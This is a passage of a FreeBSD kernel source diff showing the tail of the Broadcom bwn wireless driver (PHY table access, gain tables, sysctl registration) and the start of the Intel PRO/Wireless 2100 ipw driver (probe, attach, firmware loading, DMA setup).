BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; case BWN_TAB_32BIT: BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATAHI, value >> 16); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } } static int bwn_phy_lp_loopback(struct bwn_mac *mac) { struct bwn_phy_lp_iq_est ie; int i, index = -1; uint32_t tmp; memset(&ie, 0, sizeof(ie)); bwn_phy_lp_set_trsw_over(mac, 1, 1); BWN_PHY_SET(mac, BWN_PHY_AFE_CTL_OVR, 1); BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVRVAL, 0xfffe); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x800); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x800); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x8); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x8); BWN_RF_WRITE(mac, BWN_B2062_N_TXCTL_A, 0x80); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x80); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x80); for (i = 0; i < 32; i++) { bwn_phy_lp_set_rxgain_idx(mac, i); bwn_phy_lp_ddfs_turnon(mac, 1, 1, 5, 5, 0); if (!(bwn_phy_lp_rx_iq_est(mac, 1000, 32, &ie))) continue; tmp = (ie.ie_ipwr + ie.ie_qpwr) / 1000; if ((tmp > 4000) && (tmp < 10000)) { index = i; break; } } bwn_phy_lp_ddfs_turnoff(mac); return (index); } static void bwn_phy_lp_set_rxgain_idx(struct bwn_mac *mac, uint16_t idx) { bwn_phy_lp_set_rxgain(mac, bwn_tab_read(mac, BWN_TAB_2(12, idx))); } static void bwn_phy_lp_ddfs_turnon(struct bwn_mac *mac, int i_on, int q_on, int incr1, int incr2, int scale_idx) { bwn_phy_lp_ddfs_turnoff(mac); BWN_PHY_MASK(mac, BWN_PHY_AFE_DDFS_POINTER_INIT, 0xff80); BWN_PHY_MASK(mac, BWN_PHY_AFE_DDFS_POINTER_INIT, 0x80ff); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS_INCR_INIT, 0xff80, incr1); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS_INCR_INIT, 0x80ff, incr2 << 8); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS, 0xfff7, i_on << 3); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS, 0xffef, q_on << 4); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS, 0xff9f, scale_idx << 5); BWN_PHY_MASK(mac, BWN_PHY_AFE_DDFS, 0xfffb); BWN_PHY_SET(mac, BWN_PHY_AFE_DDFS, 0x2); BWN_PHY_SET(mac, BWN_PHY_LP_PHY_CTL, 0x20); } static uint8_t bwn_phy_lp_rx_iq_est(struct bwn_mac *mac, uint16_t sample, uint8_t time, struct bwn_phy_lp_iq_est *ie) { int i; BWN_PHY_MASK(mac, BWN_PHY_CRSGAIN_CTL, 0xfff7); BWN_PHY_WRITE(mac, BWN_PHY_IQ_NUM_SMPLS_ADDR, sample); BWN_PHY_SETMASK(mac, BWN_PHY_IQ_ENABLE_WAIT_TIME_ADDR, 0xff00, time); BWN_PHY_MASK(mac, BWN_PHY_IQ_ENABLE_WAIT_TIME_ADDR, 0xfeff); BWN_PHY_SET(mac, BWN_PHY_IQ_ENABLE_WAIT_TIME_ADDR, 0x200); for (i = 0; i < 500; i++) { if (!(BWN_PHY_READ(mac, BWN_PHY_IQ_ENABLE_WAIT_TIME_ADDR) & 0x200)) break; DELAY(1000); } if ((BWN_PHY_READ(mac, BWN_PHY_IQ_ENABLE_WAIT_TIME_ADDR) & 0x200)) { BWN_PHY_SET(mac, BWN_PHY_CRSGAIN_CTL, 0x8); return 0; } ie->ie_iqprod = BWN_PHY_READ(mac, BWN_PHY_IQ_ACC_HI_ADDR); ie->ie_iqprod <<= 16; ie->ie_iqprod |= BWN_PHY_READ(mac, BWN_PHY_IQ_ACC_LO_ADDR); ie->ie_ipwr = BWN_PHY_READ(mac, BWN_PHY_IQ_I_PWR_ACC_HI_ADDR); ie->ie_ipwr <<= 16; ie->ie_ipwr |= BWN_PHY_READ(mac, BWN_PHY_IQ_I_PWR_ACC_LO_ADDR); ie->ie_qpwr = BWN_PHY_READ(mac, BWN_PHY_IQ_Q_PWR_ACC_HI_ADDR); ie->ie_qpwr <<= 16; ie->ie_qpwr |= BWN_PHY_READ(mac, BWN_PHY_IQ_Q_PWR_ACC_LO_ADDR); BWN_PHY_SET(mac, BWN_PHY_CRSGAIN_CTL, 0x8); return 1; } static uint32_t bwn_tab_read(struct bwn_mac *mac, uint32_t typeoffset) { uint32_t offset, type, value; type = BWN_TAB_GETTYPE(typeoffset); offset = BWN_TAB_GETOFFSET(typeoffset); KASSERT(offset <= 0xffff, ("%s:%d: fail", __func__, __LINE__)); switch (type) { case BWN_TAB_8BIT: BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, 
offset); value = BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO) & 0xff; break; case BWN_TAB_16BIT: BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); value = BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO); break; case BWN_TAB_32BIT: BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); value = BWN_PHY_READ(mac, BWN_PHY_TABLEDATAHI); value <<= 16; value |= BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO); break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); value = 0; } return (value); } static void bwn_phy_lp_ddfs_turnoff(struct bwn_mac *mac) { BWN_PHY_MASK(mac, BWN_PHY_AFE_DDFS, 0xfffd); BWN_PHY_MASK(mac, BWN_PHY_LP_PHY_CTL, 0xffdf); } static void bwn_phy_lp_set_txgain_dac(struct bwn_mac *mac, uint16_t dac) { uint16_t ctl; ctl = BWN_PHY_READ(mac, BWN_PHY_AFE_DAC_CTL) & 0xc7f; ctl |= dac << 7; BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DAC_CTL, 0xf000, ctl); } static void bwn_phy_lp_set_txgain_pa(struct bwn_mac *mac, uint16_t gain) { BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xfb), 0xe03f, gain << 6); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xfd), 0x80ff, gain << 8); } static void bwn_phy_lp_set_txgain_override(struct bwn_mac *mac) { if (mac->mac_phy.rev < 2) BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x100); else { BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x80); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x4000); } BWN_PHY_SET(mac, BWN_PHY_AFE_CTL_OVR, 0x40); } static uint16_t bwn_phy_lp_get_pa_gain(struct bwn_mac *mac) { return BWN_PHY_READ(mac, BWN_PHY_OFDM(0xfb)) & 0x7f; } static uint8_t bwn_nbits(int32_t val) { uint32_t tmp; uint8_t nbits = 0; for (tmp = abs(val); tmp != 0; tmp >>= 1) nbits++; return (nbits); } static void bwn_phy_lp_gaintbl_write_multi(struct bwn_mac *mac, int offset, int count, struct bwn_txgain_entry *table) { int i; for (i = offset; i < count; i++) bwn_phy_lp_gaintbl_write(mac, i, table[i]); } static void bwn_phy_lp_gaintbl_write(struct bwn_mac *mac, int offset, struct bwn_txgain_entry data) { if (mac->mac_phy.rev >= 2) bwn_phy_lp_gaintbl_write_r2(mac, offset, data); else bwn_phy_lp_gaintbl_write_r01(mac, offset, data); } static void bwn_phy_lp_gaintbl_write_r2(struct bwn_mac *mac, int offset, struct bwn_txgain_entry te) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; KASSERT(mac->mac_phy.rev >= 2, ("%s:%d: fail", __func__, __LINE__)); tmp = (te.te_pad << 16) | (te.te_pga << 8) | te.te_gm; if (mac->mac_phy.rev >= 3) { tmp |= ((IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) ? (0x10 << 24) : (0x70 << 24)); } else { tmp |= ((IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) ? (0x14 << 24) : (0x7f << 24)); } bwn_tab_write(mac, BWN_TAB_4(7, 0xc0 + offset), tmp); bwn_tab_write(mac, BWN_TAB_4(7, 0x140 + offset), te.te_bbmult << 20 | te.te_dac << 28); } static void bwn_phy_lp_gaintbl_write_r01(struct bwn_mac *mac, int offset, struct bwn_txgain_entry te) { KASSERT(mac->mac_phy.rev < 2, ("%s:%d: fail", __func__, __LINE__)); bwn_tab_write(mac, BWN_TAB_4(10, 0xc0 + offset), (te.te_pad << 11) | (te.te_pga << 7) | (te.te_gm << 4) | te.te_dac); bwn_tab_write(mac, BWN_TAB_4(10, 0x140 + offset), te.te_bbmult << 20); } static void bwn_sysctl_node(struct bwn_softc *sc) { device_t dev = sc->sc_dev; struct bwn_mac *mac; struct bwn_stats *stats; /* XXX assume that count of MAC is only 1. 
*/ if ((mac = sc->sc_curmac) == NULL) return; stats = &mac->mac_stats; SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "linknoise", CTLFLAG_RW, &stats->rts, 0, "Noise level"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "rts", CTLFLAG_RW, &stats->rts, 0, "RTS"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "rtsfail", CTLFLAG_RW, &stats->rtsfail, 0, "RTS failed to send"); #ifdef BWN_DEBUG SYSCTL_ADD_UINT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, 0, "Debug flags"); #endif } static device_method_t bwn_methods[] = { /* Device interface */ DEVMETHOD(device_probe, bwn_probe), DEVMETHOD(device_attach, bwn_attach), DEVMETHOD(device_detach, bwn_detach), DEVMETHOD(device_suspend, bwn_suspend), DEVMETHOD(device_resume, bwn_resume), DEVMETHOD_END }; static driver_t bwn_driver = { "bwn", bwn_methods, sizeof(struct bwn_softc) }; static devclass_t bwn_devclass; DRIVER_MODULE(bwn, siba_bwn, bwn_driver, bwn_devclass, 0, 0); MODULE_DEPEND(bwn, siba_bwn, 1, 1, 1); MODULE_DEPEND(bwn, wlan, 1, 1, 1); /* 802.11 media layer */ MODULE_DEPEND(bwn, firmware, 1, 1, 1); /* firmware support */ MODULE_DEPEND(bwn, wlan_amrr, 1, 1, 1); diff --git a/sys/dev/ipw/if_ipw.c b/sys/dev/ipw/if_ipw.c index b5f4fe644945..fe693eb78998 100644 --- a/sys/dev/ipw/if_ipw.c +++ b/sys/dev/ipw/if_ipw.c @@ -1,2725 +1,2725 @@ /*- * Copyright (c) 2004-2006 * Damien Bergamini . All rights reserved. * Copyright (c) 2006 Sam Leffler, Errno Consulting * Copyright (c) 2007 Andrew Thompson * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice unmodified, this list of conditions, and the following * disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
*/ #include __FBSDID("$FreeBSD$"); /*- * Intel(R) PRO/Wireless 2100 MiniPCI driver * http://www.intel.com/network/connectivity/products/wireless/prowireless_mobile.htm */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define IPW_DEBUG #ifdef IPW_DEBUG #define DPRINTF(x) do { if (ipw_debug > 0) printf x; } while (0) #define DPRINTFN(n, x) do { if (ipw_debug >= (n)) printf x; } while (0) int ipw_debug = 0; SYSCTL_INT(_debug, OID_AUTO, ipw, CTLFLAG_RW, &ipw_debug, 0, "ipw debug level"); #else #define DPRINTF(x) #define DPRINTFN(n, x) #endif MODULE_DEPEND(ipw, pci, 1, 1, 1); MODULE_DEPEND(ipw, wlan, 1, 1, 1); MODULE_DEPEND(ipw, firmware, 1, 1, 1); struct ipw_ident { uint16_t vendor; uint16_t device; const char *name; }; static const struct ipw_ident ipw_ident_table[] = { { 0x8086, 0x1043, "Intel(R) PRO/Wireless 2100 MiniPCI" }, { 0, 0, NULL } }; static struct ieee80211vap *ipw_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void ipw_vap_delete(struct ieee80211vap *); static int ipw_dma_alloc(struct ipw_softc *); static void ipw_release(struct ipw_softc *); static void ipw_media_status(struct ifnet *, struct ifmediareq *); static int ipw_newstate(struct ieee80211vap *, enum ieee80211_state, int); static uint16_t ipw_read_prom_word(struct ipw_softc *, uint8_t); static void ipw_rx_cmd_intr(struct ipw_softc *, struct ipw_soft_buf *); static void ipw_rx_newstate_intr(struct ipw_softc *, struct ipw_soft_buf *); static void ipw_rx_data_intr(struct ipw_softc *, struct ipw_status *, struct ipw_soft_bd *, struct ipw_soft_buf *); static void ipw_rx_intr(struct ipw_softc *); static void ipw_release_sbd(struct ipw_softc *, struct ipw_soft_bd *); static void ipw_tx_intr(struct ipw_softc *); static void ipw_intr(void *); static void ipw_dma_map_addr(void *, bus_dma_segment_t *, int, int); static const char * ipw_cmdname(int); static int ipw_cmd(struct ipw_softc *, uint32_t, void *, uint32_t); static int ipw_tx_start(struct ifnet *, struct mbuf *, struct ieee80211_node *); static int ipw_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void ipw_start(struct ifnet *); static void ipw_start_locked(struct ifnet *); static void ipw_watchdog(void *); static int ipw_ioctl(struct ifnet *, u_long, caddr_t); static void ipw_stop_master(struct ipw_softc *); static int ipw_enable(struct ipw_softc *); static int ipw_disable(struct ipw_softc *); static int ipw_reset(struct ipw_softc *); static int ipw_load_ucode(struct ipw_softc *, const char *, int); static int ipw_load_firmware(struct ipw_softc *, const char *, int); static int ipw_config(struct ipw_softc *); static void ipw_assoc(struct ieee80211com *, struct ieee80211vap *); static void ipw_disassoc(struct ieee80211com *, struct ieee80211vap *); static void ipw_init_task(void *, int); static void ipw_init(void *); static void ipw_init_locked(struct ipw_softc *); static void ipw_stop(void *); static void ipw_stop_locked(struct ipw_softc *); static int ipw_sysctl_stats(SYSCTL_HANDLER_ARGS); static int ipw_sysctl_radio(SYSCTL_HANDLER_ARGS); static uint32_t ipw_read_table1(struct ipw_softc *, uint32_t); static void 
ipw_write_table1(struct ipw_softc *, uint32_t, uint32_t); #if 0 static int ipw_read_table2(struct ipw_softc *, uint32_t, void *, uint32_t *); static void ipw_read_mem_1(struct ipw_softc *, bus_size_t, uint8_t *, bus_size_t); #endif static void ipw_write_mem_1(struct ipw_softc *, bus_size_t, const uint8_t *, bus_size_t); static int ipw_scan(struct ipw_softc *); static void ipw_scan_start(struct ieee80211com *); static void ipw_scan_end(struct ieee80211com *); static void ipw_set_channel(struct ieee80211com *); static void ipw_scan_curchan(struct ieee80211_scan_state *, unsigned long maxdwell); static void ipw_scan_mindwell(struct ieee80211_scan_state *); static int ipw_probe(device_t); static int ipw_attach(device_t); static int ipw_detach(device_t); static int ipw_shutdown(device_t); static int ipw_suspend(device_t); static int ipw_resume(device_t); static device_method_t ipw_methods[] = { /* Device interface */ DEVMETHOD(device_probe, ipw_probe), DEVMETHOD(device_attach, ipw_attach), DEVMETHOD(device_detach, ipw_detach), DEVMETHOD(device_shutdown, ipw_shutdown), DEVMETHOD(device_suspend, ipw_suspend), DEVMETHOD(device_resume, ipw_resume), DEVMETHOD_END }; static driver_t ipw_driver = { "ipw", ipw_methods, sizeof (struct ipw_softc) }; static devclass_t ipw_devclass; DRIVER_MODULE(ipw, pci, ipw_driver, ipw_devclass, NULL, NULL); MODULE_VERSION(ipw, 1); static int ipw_probe(device_t dev) { const struct ipw_ident *ident; for (ident = ipw_ident_table; ident->name != NULL; ident++) { if (pci_get_vendor(dev) == ident->vendor && pci_get_device(dev) == ident->device) { device_set_desc(dev, ident->name); return (BUS_PROBE_DEFAULT); } } return ENXIO; } /* Base Address Register */ static int ipw_attach(device_t dev) { struct ipw_softc *sc = device_get_softc(dev); struct ifnet *ifp; struct ieee80211com *ic; struct ieee80211_channel *c; uint16_t val; int error, i; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; mtx_init(&sc->sc_mtx, device_get_nameunit(dev), MTX_NETWORK_LOCK, MTX_DEF | MTX_RECURSE); TASK_INIT(&sc->sc_init_task, 0, ipw_init_task, sc); callout_init_mtx(&sc->sc_wdtimer, &sc->sc_mtx, 0); pci_write_config(dev, 0x41, 0, 1); /* enable bus-mastering */ pci_enable_busmaster(dev); i = PCIR_BAR(0); sc->mem = bus_alloc_resource_any(dev, SYS_RES_MEMORY, &i, RF_ACTIVE); if (sc->mem == NULL) { device_printf(dev, "could not allocate memory resource\n"); goto fail; } sc->sc_st = rman_get_bustag(sc->mem); sc->sc_sh = rman_get_bushandle(sc->mem); i = 0; sc->irq = bus_alloc_resource_any(dev, SYS_RES_IRQ, &i, RF_ACTIVE | RF_SHAREABLE); if (sc->irq == NULL) { device_printf(dev, "could not allocate interrupt resource\n"); goto fail1; } if (ipw_reset(sc) != 0) { device_printf(dev, "could not reset adapter\n"); goto fail2; } if (ipw_dma_alloc(sc) != 0) { device_printf(dev, "could not allocate DMA resources\n"); goto fail2; } ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not if_alloc()\n"); goto fail3; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = ipw_init; ifp->if_ioctl = ipw_ioctl; ifp->if_start = ipw_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_opmode = IEEE80211_M_STA; ic->ic_phytype = IEEE80211_T_DS; /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_IBSS /* IBSS mode supported */ 
| IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_PMGT /* power save supported */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_WPA /* 802.11i supported */ ; /* read MAC address from EEPROM */ val = ipw_read_prom_word(sc, IPW_EEPROM_MAC + 0); macaddr[0] = val >> 8; macaddr[1] = val & 0xff; val = ipw_read_prom_word(sc, IPW_EEPROM_MAC + 1); macaddr[2] = val >> 8; macaddr[3] = val & 0xff; val = ipw_read_prom_word(sc, IPW_EEPROM_MAC + 2); macaddr[4] = val >> 8; macaddr[5] = val & 0xff; /* set supported .11b channels (read from EEPROM) */ if ((val = ipw_read_prom_word(sc, IPW_EEPROM_CHANNEL_LIST)) == 0) val = 0x7ff; /* default to channels 1-11 */ val <<= 1; for (i = 1; i < 16; i++) { if (val & (1 << i)) { c = &ic->ic_channels[ic->ic_nchans++]; c->ic_freq = ieee80211_ieee2mhz(i, IEEE80211_CHAN_2GHZ); c->ic_flags = IEEE80211_CHAN_B; c->ic_ieee = i; } } /* check support for radio transmitter switch in EEPROM */ if (!(ipw_read_prom_word(sc, IPW_EEPROM_RADIO) & 8)) sc->flags |= IPW_FLAG_HAS_RADIO_SWITCH; ieee80211_ifattach(ic, macaddr); ic->ic_scan_start = ipw_scan_start; ic->ic_scan_end = ipw_scan_end; ic->ic_set_channel = ipw_set_channel; ic->ic_scan_curchan = ipw_scan_curchan; ic->ic_scan_mindwell = ipw_scan_mindwell; ic->ic_raw_xmit = ipw_raw_xmit; ic->ic_vap_create = ipw_vap_create; ic->ic_vap_delete = ipw_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), IPW_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), IPW_RX_RADIOTAP_PRESENT); /* * Add a few sysctl knobs. */ SYSCTL_ADD_PROC(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "radio", CTLTYPE_INT | CTLFLAG_RD, sc, 0, ipw_sysctl_radio, "I", "radio transmitter switch state (0=off, 1=on)"); SYSCTL_ADD_PROC(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "stats", CTLTYPE_OPAQUE | CTLFLAG_RD, sc, 0, ipw_sysctl_stats, "S", "statistics"); /* * Hook our interrupt after all initialization is complete. 
*/ error = bus_setup_intr(dev, sc->irq, INTR_TYPE_NET | INTR_MPSAFE, NULL, ipw_intr, sc, &sc->sc_ih); if (error != 0) { device_printf(dev, "could not set up interrupt\n"); goto fail4; } if (bootverbose) ieee80211_announce(ic); return 0; fail4: if_free(ifp); fail3: ipw_release(sc); fail2: bus_release_resource(dev, SYS_RES_IRQ, rman_get_rid(sc->irq), sc->irq); fail1: bus_release_resource(dev, SYS_RES_MEMORY, rman_get_rid(sc->mem), sc->mem); fail: mtx_destroy(&sc->sc_mtx); return ENXIO; } static int ipw_detach(device_t dev) { struct ipw_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; bus_teardown_intr(dev, sc->irq, sc->sc_ih); ieee80211_draintask(ic, &sc->sc_init_task); ipw_stop(sc); ieee80211_ifdetach(ic); callout_drain(&sc->sc_wdtimer); ipw_release(sc); bus_release_resource(dev, SYS_RES_IRQ, rman_get_rid(sc->irq), sc->irq); bus_release_resource(dev, SYS_RES_MEMORY, rman_get_rid(sc->mem), sc->mem); if_free(ifp); if (sc->sc_firmware != NULL) { firmware_put(sc->sc_firmware, FIRMWARE_UNLOAD); sc->sc_firmware = NULL; } mtx_destroy(&sc->sc_mtx); return 0; } static struct ieee80211vap * ipw_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct ipw_softc *sc = ifp->if_softc; struct ipw_vap *ivp; struct ieee80211vap *vap; const struct firmware *fp; const struct ipw_firmware_hdr *hdr; const char *imagename; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; switch (opmode) { case IEEE80211_M_STA: imagename = "ipw_bss"; break; case IEEE80211_M_IBSS: imagename = "ipw_ibss"; break; case IEEE80211_M_MONITOR: imagename = "ipw_monitor"; break; default: return NULL; } /* * Load firmware image using the firmware(9) subsystem. Doing * this unlocked is ok since we're single-threaded by the * 802.11 layer. 
*/ if (sc->sc_firmware == NULL || strcmp(sc->sc_firmware->name, imagename) != 0) { if (sc->sc_firmware != NULL) firmware_put(sc->sc_firmware, FIRMWARE_UNLOAD); sc->sc_firmware = firmware_get(imagename); } if (sc->sc_firmware == NULL) { device_printf(sc->sc_dev, "could not load firmware image '%s'\n", imagename); return NULL; } fp = sc->sc_firmware; if (fp->datasize < sizeof *hdr) { device_printf(sc->sc_dev, "firmware image too short %zu\n", fp->datasize); firmware_put(sc->sc_firmware, FIRMWARE_UNLOAD); sc->sc_firmware = NULL; return NULL; } hdr = (const struct ipw_firmware_hdr *)fp->data; if (fp->datasize < sizeof *hdr + le32toh(hdr->mainsz) + le32toh(hdr->ucodesz)) { device_printf(sc->sc_dev, "firmware image too short %zu\n", fp->datasize); firmware_put(sc->sc_firmware, FIRMWARE_UNLOAD); sc->sc_firmware = NULL; return NULL; } ivp = (struct ipw_vap *) malloc(sizeof(struct ipw_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (ivp == NULL) return NULL; vap = &ivp->vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override with driver methods */ ivp->newstate = vap->iv_newstate; vap->iv_newstate = ipw_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ipw_media_status); ic->ic_opmode = opmode; return vap; } static void ipw_vap_delete(struct ieee80211vap *vap) { struct ipw_vap *ivp = IPW_VAP(vap); ieee80211_vap_detach(vap); free(ivp, M_80211_VAP); } static int ipw_dma_alloc(struct ipw_softc *sc) { struct ipw_soft_bd *sbd; struct ipw_soft_hdr *shdr; struct ipw_soft_buf *sbuf; bus_addr_t physaddr; int error, i; /* * Allocate parent DMA tag for subsequent allocations. */ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, BUS_SPACE_MAXSIZE_32BIT, BUS_SPACE_UNRESTRICTED, BUS_SPACE_MAXSIZE_32BIT, 0, NULL, NULL, &sc->parent_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create parent DMA tag\n"); goto fail; } /* * Allocate and map tx ring. */ error = bus_dma_tag_create(sc->parent_dmat, 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, IPW_TBD_SZ, 1, IPW_TBD_SZ, 0, NULL, NULL, &sc->tbd_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create tx ring DMA tag\n"); goto fail; } error = bus_dmamem_alloc(sc->tbd_dmat, (void **)&sc->tbd_list, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &sc->tbd_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate tx ring DMA memory\n"); goto fail; } error = bus_dmamap_load(sc->tbd_dmat, sc->tbd_map, sc->tbd_list, IPW_TBD_SZ, ipw_dma_map_addr, &sc->tbd_phys, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map tx ring DMA memory\n"); goto fail; } /* * Allocate and map rx ring. */ error = bus_dma_tag_create(sc->parent_dmat, 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, IPW_RBD_SZ, 1, IPW_RBD_SZ, 0, NULL, NULL, &sc->rbd_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create rx ring DMA tag\n"); goto fail; } error = bus_dmamem_alloc(sc->rbd_dmat, (void **)&sc->rbd_list, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &sc->rbd_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate rx ring DMA memory\n"); goto fail; } error = bus_dmamap_load(sc->rbd_dmat, sc->rbd_map, sc->rbd_list, IPW_RBD_SZ, ipw_dma_map_addr, &sc->rbd_phys, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map rx ring DMA memory\n"); goto fail; } /* * Allocate and map status ring. 
*/ error = bus_dma_tag_create(sc->parent_dmat, 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, IPW_STATUS_SZ, 1, IPW_STATUS_SZ, 0, NULL, NULL, &sc->status_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create status ring DMA tag\n"); goto fail; } error = bus_dmamem_alloc(sc->status_dmat, (void **)&sc->status_list, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &sc->status_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate status ring DMA memory\n"); goto fail; } error = bus_dmamap_load(sc->status_dmat, sc->status_map, sc->status_list, IPW_STATUS_SZ, ipw_dma_map_addr, &sc->status_phys, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map status ring DMA memory\n"); goto fail; } /* * Allocate command DMA map. */ error = bus_dma_tag_create(sc->parent_dmat, 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, sizeof (struct ipw_cmd), 1, sizeof (struct ipw_cmd), 0, NULL, NULL, &sc->cmd_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create command DMA tag\n"); goto fail; } error = bus_dmamap_create(sc->cmd_dmat, 0, &sc->cmd_map); if (error != 0) { device_printf(sc->sc_dev, "could not create command DMA map\n"); goto fail; } /* * 